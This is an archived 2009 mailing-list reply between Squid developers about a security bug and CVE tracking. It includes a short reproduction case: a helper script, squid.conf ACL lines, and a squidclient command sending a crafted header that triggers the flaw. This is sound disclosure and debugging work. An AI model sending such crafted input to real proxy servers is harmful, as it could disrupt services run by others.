Tue 2009-10-13 at 12:12 +1300, Amos Jeffries wrote:
> Okay, I've asked the Debian reporter for access to details.
> Lacking clear evidence of remote exploit I'll follow along with the quiet
> approach.
Right.. meant to provide the details as well but forgot... It can be
found in the RedHat bug report.
https://bugzilla.redhat.com/show_bug.cgi?id=518182
A sample test case is as follows:
-- test-helper.sh (executable) ---
#!/bin/sh
while read line; do
    echo OK
done
-- end test-helper.sh
-- squid.conf (before where access is normally allowed) --
external_acl_type test %{Test:;test} /path/to/test-helper.sh
acl test external test
http_access deny !test
-- end squid.conf --
-- test command --
/usr/bin/squidclient -H "Test: a, b, test=test\n" http://www.squid-cache.org/
-- end test command --
> The CVE has reference to our bugs which are clearly closed. If there is
> more to be done to notify anyone can you let me know what that is please?
> The other CVE from this year are in similar states of questionable
> open/closed-ness.
Ah, now I get what you mean.
Yes, we should be more active in giving vendor feedback to CVE in
general. Contacting cve_at_mitre.org is a good start, I guess.
Regards
Henrik
Received on Mon Oct 12 2009 - 23:51:22 MDT